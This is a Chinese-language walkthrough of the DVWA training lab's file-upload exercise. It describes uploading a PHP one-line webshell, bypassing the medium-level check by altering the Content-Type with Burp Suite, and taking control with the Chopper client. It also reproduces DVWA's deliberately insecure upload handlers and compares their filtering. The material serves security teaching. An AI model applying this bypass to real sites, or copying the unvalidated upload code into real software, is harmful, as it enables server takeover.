1、file upload文件上传,测试界面
2、security=low时的上传
(1)直接上传php一句话木马,没有过滤,上传成功,根据提示路径链接菜刀
(2)菜刀链接,webshell拿到
3、security=medium时的上传
(1)直接上传php格式文件,上传失败
(2)测试上传图片格式文件,上传成功
(3)使用Burp Suite工具进行两次抓包,在compare中比较
(4)重新上传php木马,修改content-type属性,上传成功
(5)菜刀链接,拿到webshell
下面分析源代码:
1、Low File Upload Source
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename( $_FILES['uploaded']['name']);
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '
';
echo 'Your image was not uploaded.';
echo '
';} else {
echo '
';
echo $target_path . ' succesfully uploaded!';
echo '
';}
}
?>
2、Medium File Upload Source
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '
';
echo 'Your image was not uploaded.';
echo '
';} else {
echo '
';
echo $target_path . ' succesfully uploaded!';
echo '
';}
}
else{
echo '
Your image was not uploaded.';
}
}
?>
3、High File Upload Source
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '
';
echo 'Your image was not uploaded.';
echo '
';} else {
echo '
';
echo $target_path . ' succesfully uploaded!';
echo '
';}
}
else{
echo '
';
echo 'Your image was not uploaded.';
echo '
';}
}
?>
比较发现:
Low级别代码对上传文件几乎没有任何处理,可上传任意格式、大小文件
Medium级别代码对上传文件进行了格式判断,需要是 image/jpeg格式,并且文件限制了大小,不能太大,可以有效防止直接上传大马。此种方法可以通过修改包来绕过
High级别代码通过代码分析出文件的后缀名,当后缀名是jpg、JPG、jpeg、JPEG,并且文件大小小于100000时才可以上传,当上传的格式是Jpg,jPg,JPeg等大小写混写时,也上传失败,这是一种基于白名单的过滤策略,效果不错。